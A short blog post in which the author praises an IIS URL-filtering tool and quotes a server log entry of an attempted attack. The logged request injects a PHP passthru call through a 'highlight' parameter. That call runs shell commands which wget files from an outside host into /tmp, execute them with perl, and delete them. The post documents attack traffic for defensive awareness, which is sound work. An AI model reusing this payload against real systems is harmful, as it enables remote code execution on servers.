I love this tool. It comes as part of the IIS Lockdown Tool from Microsoft.
And it seems to work well. Here lately I have been the target of a few (! actually someone really wants to get in!) attacks from a source (or sources) that is trying to get in by using a very long URL that will cause an overflow.
HERE is an example from my logs:
2005-01-04 06:26:02 65.75.185.100 - GET / ~/blog/Rss.aspx&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; 404 4203 HTTP/1.1 LWP::Simple/5.803 -
69.61.61.146 - same URL
66.98.214.89
64.191.29.200
Tsk, tsk. When will people learn?